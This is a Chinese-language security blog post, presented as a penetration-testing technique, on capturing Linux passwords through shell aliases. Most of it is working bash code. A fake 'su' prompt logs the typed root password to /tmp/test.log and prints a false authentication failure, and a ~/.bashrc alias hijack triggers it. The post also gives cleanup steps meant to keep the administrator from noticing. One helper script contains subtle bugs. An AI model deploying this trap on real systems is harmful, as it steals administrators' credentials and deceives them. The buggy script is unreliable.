<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Linux利用别名抓取账户切换时密码 | Knsec         |       博观而约取 - 厚积而薄发</title>
  <meta name="keywords" content=" Linux , 渗透技巧 ">
  <meta name="description" content="Linux利用别名抓取账户切换时密码 | Knsec         |       博观而约取 - 厚积而薄发">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="修改源码文件路径 .\ntdsxtract-master\ntds\dsencryption.py源文件(67、68行)     hash &#x3D; d1.decrypt(enc_hash[:8]) + d2.decrypt(enc_hash[8:])     return hash 修改之后     hash &#x3D; d1.decrypt(enc_hash[:8]) + d2.decrypt(enc_ha">
<meta property="og:type" content="article">
<meta property="og:title" content="解决ntdsxtract无法分解win2016的ntds">
<meta property="og:url" content="http://knsec.github.io/2020/08/19/%E8%A7%A3%E5%86%B3ntdsxtract%E6%97%A0%E6%B3%95%E5%88%86%E8%A7%A3win2016%E7%9A%84ntds/index.html">
<meta property="og:site_name" content="Knsec         |       博观而约取 - 厚积而薄发">
<meta property="og:description" content="修改源码文件路径 .\ntdsxtract-master\ntds\dsencryption.py源文件(67、68行)     hash &#x3D; d1.decrypt(enc_hash[:8]) + d2.decrypt(enc_hash[8:])     return hash 修改之后     hash &#x3D; d1.decrypt(enc_hash[:8]) + d2.decrypt(enc_ha">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-08-19T15:28:28.000Z">
<meta property="article:modified_time" content="2020-08-19T15:30:01.200Z">
<meta property="article:author" content="Knsec">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-dark.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 4.2.1"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
</div>


<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/avatar.jpg" />
</a>
<div class="author">
    <span>Knsec</span>
</div>

<div class="icon">
    
        
    
        
        <a title="github" href="https://github.com/Knsec" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-github"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
</div>




<ul>
    <li><div class="all active" data-rel="全部文章">全部文章<small>(19)</small></div></li>
    
        
            
            <li><div data-rel="tools">tools<small>(2)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="内网安全">内网安全<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="手法技巧">手法技巧<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="暂未公开">暂未公开<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="杂记">杂记<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="漏洞复现">漏洞复现<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="脚本">脚本<small>(3)</small></div>
                
            </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="19">
<input type="hidden" id="yelog_site_word_count" value="8.1k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" />
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Centos7</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Centos7配置网络</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Exchange</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Linux</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python3</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>tools</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>vbs脚本</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>windows</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>其他</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网安全学习</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网渗透</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>后门</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>域数据库</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>域渗透</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>工具</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>抓取密码</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>注册表</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>渗透技巧</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>漏洞复现</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        <a id="top" class="全部文章 内网安全 "
           href="/2020/07/17/Windows%E8%AE%A4%E8%AF%81%E5%AD%A6%E4%B9%A0%5B%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%5D/"
           data-tag="内网安全学习"
           data-author="" >
            <span class="post-title" title="Windows认证学习[持续更新]">Windows认证学习[持续更新]</span>
            <span class="post-date" title="2020-07-17 16:41:20">2020/07/17</span>
        </a>
        
        <a  class="全部文章 "
           href="/2020/08/19/%E8%A7%A3%E5%86%B3ntdsxtract%E6%97%A0%E6%B3%95%E5%88%86%E8%A7%A3win2016%E7%9A%84ntds/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="解决ntdsxtract无法分解win2016的ntds">解决ntdsxtract无法分解win2016的ntds</span>
            <span class="post-date" title="2020-08-19 23:28:28">2020/08/19</span>
        </a>
        
        <a  class="全部文章 脚本 "
           href="/2020/08/15/python3%E8%8E%B7%E5%8F%96%E8%AF%81%E4%B9%A6%E4%BF%A1%E6%81%AF/"
           data-tag="python3"
           data-author="" >
            <span class="post-title" title="python3获取证书信息">python3获取证书信息</span>
            <span class="post-date" title="2020-08-15 00:17:00">2020/08/15</span>
        </a>
        
        <a  class="全部文章 "
           href="/2020/07/20/chrome%E4%B8%ADhackbar%E7%A0%B4%E8%A7%A3/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="chrome中hackbar破解">chrome中hackbar破解</span>
            <span class="post-date" title="2020-07-20 09:59:30">2020/07/20</span>
        </a>
        
        <a  class="全部文章 手法技巧 "
           href="/2020/07/18/Win%E6%9A%B4%E5%8A%9B%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%8A%AB%E6%8C%81%E5%90%8E%E9%97%A8/"
           data-tag="windows,注册表,后门"
           data-author="" >
            <span class="post-title" title="Win暴力注册表劫持后门">Win暴力注册表劫持后门</span>
            <span class="post-date" title="2020-07-18 13:14:19">2020/07/18</span>
        </a>
        
        <a  class="全部文章 手法技巧 "
           href="/2020/07/18/%E9%80%9A%E8%BF%87%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%85%B3%E9%97%ADWindows-Defender/"
           data-tag="windows"
           data-author="" >
            <span class="post-title" title="通过注册表关闭Windows_Defender">通过注册表关闭Windows_Defender</span>
            <span class="post-date" title="2020-07-18 12:57:43">2020/07/18</span>
        </a>
        
        <a  class="全部文章 暂未公开 "
           href="/2020/07/17/dump-ntds%E8%84%9A%E6%9C%AC/"
           data-tag="vbs脚本,域数据库,域渗透,内网渗透"
           data-author="" >
            <span class="post-title" title="dump_ntds脚本">dump_ntds脚本</span>
            <span class="post-date" title="2020-07-17 21:51:06">2020/07/17</span>
        </a>
        
        <a  class="全部文章 暂未公开 "
           href="/2020/07/17/windget%E8%8E%B7%E5%8F%96win%E5%AF%86%E7%A0%81%E5%85%8D%E6%9D%80/"
           data-tag="windows,工具,抓取密码"
           data-author="" >
            <span class="post-title" title="windget获取win密码免杀">windget获取win密码免杀</span>
            <span class="post-date" title="2020-07-17 21:04:56">2020/07/17</span>
        </a>
        
        <a  class="全部文章 脚本 "
           href="/2020/07/17/fofa-dump-python3/"
           data-tag="python3"
           data-author="" >
            <span class="post-title" title="fofa-dump_python3">fofa-dump_python3</span>
            <span class="post-date" title="2020-07-17 20:51:39">2020/07/17</span>
        </a>
        
        <a  class="全部文章 暂未公开 "
           href="/2020/07/17/password_h/"
           data-tag="windows,工具"
           data-author="" >
            <span class="post-title" title="password_h">password_h</span>
            <span class="post-date" title="2020-07-17 20:30:40">2020/07/17</span>
        </a>
        
        <a  class="全部文章 脚本 "
           href="/2020/07/17/python3%E8%8E%B7%E5%8F%96PDF%E5%9B%BE%E7%89%87%E4%B8%8E%E6%96%87%E5%AD%97/"
           data-tag="python3"
           data-author="" >
            <span class="post-title" title="python3获取PDF图片与文字">python3获取PDF图片与文字</span>
            <span class="post-date" title="2020-07-17 20:25:05">2020/07/17</span>
        </a>
        
        <a  class="全部文章 tools "
           href="/2020/07/17/win%E5%88%A9%E7%94%A8pwdump7%E5%AF%BC%E8%B4%A6%E6%88%B7%E5%AF%86%E7%A0%81/"
           data-tag="tools"
           data-author="" >
            <span class="post-title" title="win利用pwdump7导账户密码">win利用pwdump7导账户密码</span>
            <span class="post-date" title="2020-07-17 18:25:58">2020/07/17</span>
        </a>
        
        <a  class="全部文章 tools "
           href="/2020/07/17/%E5%88%A9%E7%94%A8Sqlck%E5%AF%B9SA%E7%88%86%E7%A0%B4/"
           data-tag="tools"
           data-author="" >
            <span class="post-title" title="利用Sqlck对SA爆破">利用Sqlck对SA爆破</span>
            <span class="post-date" title="2020-07-17 17:16:31">2020/07/17</span>
        </a>
        
        <a  class="全部文章 杂记 "
           href="/2020/07/09/Centos7%E5%88%9D%E5%A7%8B%E5%8C%96%E9%85%8D%E7%BD%AE/"
           data-tag="Centos7,Centos7配置网络"
           data-author="" >
            <span class="post-title" title="Centos7初始化配置">Centos7初始化配置</span>
            <span class="post-date" title="2020-07-09 20:35:53">2020/07/09</span>
        </a>
        
        <a  class="全部文章 手法技巧 "
           href="/2020/07/09/Linux%E5%88%A9%E7%94%A8%E5%88%AB%E5%90%8D%E6%8A%93%E5%8F%96%E8%B4%A6%E6%88%B7%E5%88%87%E6%8D%A2%E6%97%B6%E5%AF%86%E7%A0%81/"
           data-tag="Linux,渗透技巧"
           data-author="" >
            <span class="post-title" title="Linux利用别名抓取账户切换时密码">Linux利用别名抓取账户切换时密码</span>
            <span class="post-date" title="2020-07-09 20:08:23">2020/07/09</span>
        </a>
        
        <a  class="全部文章 漏洞复现 "
           href="/2020/07/09/ExchangeServer-CVE-2020-0688%E5%A4%8D%E7%8E%B0/"
           data-tag="漏洞复现,Exchange,内网"
           data-author="" >
            <span class="post-title" title="ExchangeServer CVE-2020-0688复现">ExchangeServer CVE-2020-0688复现</span>
            <span class="post-date" title="2020-07-09 12:11:00">2020/07/09</span>
        </a>
        
        <a  class="全部文章 杂记 "
           href="/2020/07/09/%E4%BB%A5%E8%BE%83%E5%BF%AB%E7%9A%84%E9%80%9F%E5%BA%A6%E8%AE%BF%E9%97%AEGithub/"
           data-tag="其他"
           data-author="" >
            <span class="post-title" title="以较快的速度访问Github">以较快的速度访问Github</span>
            <span class="post-date" title="2020-07-09 11:19:12">2020/07/09</span>
        </a>
        
        <a  class="全部文章 杂记 "
           href="/2020/07/09/%E8%AE%B0%E6%90%AD%E5%BB%BA%E5%8D%9A%E5%AE%A2%E7%A2%B0%E5%88%B0%E7%9A%84%E5%9D%91/"
           data-tag="其他"
           data-author="" >
            <span class="post-title" title="记搭建博客碰到的坑">记搭建博客碰到的坑</span>
            <span class="post-date" title="2020-07-09 11:04:00">2020/07/09</span>
        </a>
        
        <a  class="全部文章 "
           href="/2020/07/08/Git%E5%9F%BA%E6%9C%AC%E7%94%A8%E6%B3%95/"
           data-tag="其他"
           data-author="" >
            <span class="post-title" title="Git基本用法">Git基本用法</span>
            <span class="post-date" title="2020-07-08 23:40:16">2020/07/08</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-Linux利用别名抓取账户切换时密码" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">Linux利用别名抓取账户切换时密码</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="手法技巧">手法技巧</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color1">Linux</a>
            
            <a class="color5">渗透技巧</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2020-07-17 18:14:26'>2020-07-09 20:08</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:838</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#实现思路"><span class="toc-text">实现思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#具体实现（方法1）"><span class="toc-text">具体实现（方法1）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#方法2"><span class="toc-text">方法2</span></a></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="实现思路"><a href="#实现思路" class="headerlink" title="实现思路"></a>实现思路</h3><blockquote>
<p>在Linux系统下，有个 <strong>~/.bashrc文件</strong></p>
</blockquote>
<pre><code class="bash"># .bashrc

# User specific aliases and functions

alias rm=&#39;rm -i&#39;
alias cp=&#39;cp -i&#39;
alias mv=&#39;mv -i&#39;
alias ll=&#39;ls -all&#39;    # 这是我刚刚添加的，
# Source global definitions
if [ -f /etc/bashrc ]; then
        . /etc/bashrc
fi</code></pre>
<pre><code class="bash">source ~/.bashrc   # 重启环境变量之后别名才能生效，或直接注销当前账户也行</code></pre>
<blockquote>
<p>此时在终端输入 ‘ll’ 相当于输入ls -all</p>
</blockquote>
<pre><code class="bash">[root@localhost ~]# ll
总用量 36
dr-xr-x---.  2 root root  175 7月   9 09:03 .
dr-xr-xr-x. 17 root root  224 7月   9 2020 ..
-rw-------.  1 root root 1399 7月   9 2020 anaconda-ks.cfg
-rw-------.  1 root root  421 7月   9 09:03 .bash_history
-rw-r--r--.  1 root root   18 12月 28 2013 .bash_logout
-rw-r--r--.  1 root root  176 12月 28 2013 .bash_profile
-rw-r--r--.  1 root root  194 7月   9 09:03 .bashrc
-rw-r--r--.  1 root root  100 12月 28 2013 .cshrc
-rw-r--r--.  1 root root  129 12月 28 2013 .tcshrc
-rw-------.  1 root root  639 7月   9 09:03 .viminfo
</code></pre>
<p><strong>输入ll的时候相当于ls -all ，在渗透测试时拿到低权限用户，不考虑提权，可以对此用户进行一个账户密码抓取</strong></p>
<h3 id="具体实现（方法1）"><a href="#具体实现（方法1）" class="headerlink" title="具体实现（方法1）"></a>具体实现（方法1）</h3><blockquote>
<p>看一下当低权限用户使用su 切换用户时，正常的信息显示</p>
</blockquote>
<pre><code class="bash">[Knsec@localhost ~]$ su - root
Password: 
su: Authentication failure
[Knsec@localhost ~]$ </code></pre>
<blockquote>
<p>编写shell脚本，并把抓到的密码存到想存的地方</p>
</blockquote>
<pre><code class="bash">#!/bin/bash
echo -e &quot;Password: \c&quot;  # \c 为不换行
read -s pass
echo $pass &gt;&gt; /tmp/test.log
echo &quot;&quot;
echo &quot;su: Authentication failure&quot;</code></pre>
<pre><code class="bash">chmod 755 1.sh    # 添加权限</code></pre>
<p><img src="/../images/image-20200709211848965.png" alt="image-20200709211848965"></p>
<p>嗯。。。 有点这个意思了</p>
<p>利用上面说到的别名进行修改。<strong>记得重启环境变量</strong></p>
<p><img src="/../images/image-20200709212233643.png" alt="image-20200709212233643"></p>
<pre><code class="bash">source ~/.bashrc</code></pre>
<p><img src="/../images/image-20200709212421145.png" alt="image-20200709212421145"></p>
<p>但是这样管理员会一直无法认证成功，最后导致暴露。在脚本原有的基础上添加</p>
<pre><code class="bash">#!/bin/bash
echo -e &quot;Password: \c&quot;  # \c 为不换行
read -s pass
echo $pass &gt;&gt; /tmp/test.log
echo &quot;&quot;
echo &quot;su: Authentication failure&quot;
cp -p /tmp/.bashrc .bashrc
rm /tmp/.bashrc
source ~/.bashrc</code></pre>
<blockquote>
<p>把源文件备份至指定可写目录中</p>
</blockquote>
<p>然后运行</p>
<p><img src="/../images/image-20200709213718232.png" alt="image-20200709213718232"></p>
<p>失败一次之后，管理员可能会觉得是自己密码打错了，此时我们已经抓了密码。</p>
<h3 id="方法2"><a href="#方法2" class="headerlink" title="方法2"></a>方法2</h3><blockquote>
<p>此时存在一个问题，当用户退出时，如果习惯使用exit退出终端，需要输入两边才可能退出</p>
</blockquote>
<p><img src="/../images/image-20200709213934721.png" alt="image-20200709213934721"></p>
<blockquote>
<p>此时需要分析管理员的习惯，是习惯直接关掉终端还是习惯使用exit退出终端之后再关掉窗口</p>
</blockquote>
<p>如果习惯使用exit则使用下面方法</p>
<p>备份两个源.bashrc文件</p>
<pre><code class="bash">[Knsec@localhost ~]$ cp -p .bashrc /tmp/.bashrc
[Knsec@localhost ~]$ cp -p .bashrc /tmp/.bashrc_tmp</code></pre>
<p>修改.bashrc_tmp</p>
<pre><code class="bash">alias exit=&#39;./2.sh&#39;</code></pre>
<p>修改1.sh</p>
<pre><code class="bash">#!/bin/bash
echo -e &quot;Password: \c&quot;  # \c 为不换行
read -s pass
echo $pass &gt;&gt; /tmp/test.log
echo &quot;&quot;
echo &quot;su: Authentication failure&quot;
cp -p /tmp/.bashrc_tmp .bashrc
rm /tmp/.bashrc_tmp
bash</code></pre>
<p>修改2.sh</p>
<pre><code class="bash">#!/bin/bash
#  寻找su恶意脚本并kill掉，实现一次exit就退出
ps_result=`ps -ef | grep &quot;/bin/bash ./1.sh&quot;` 
pid=`echo $tmp | awk &#39;{print $3}&#39;`
cp -p /tmp/.bashrc .bashrc 
rm /tmp/.bashrc kill -9 $pid</code></pre>
<p>效果：</p>
<pre><code class="bash">[Knsec@localhost ~]$ su - root
Password: 
su: Authentication failure
[Knsec@localhost ~]$ su - root
Password：
Last login：Thu Jul 9 09:42:40 EDT 2020 on pts/0 
[root@localhost ~]# exit
logout
[Knsec@localhost ~]$ 
</code></pre>
<blockquote>
<p>至此，管理员习惯输入exit退出终端时，执行完恶意脚本，输入一次exit即可退出终端</p>
<p>如果是管理员习惯直接关掉窗口，则使用方法1</p>
</blockquote>

      
       
    </div>
</article>







    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2020-2020 Knsec
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
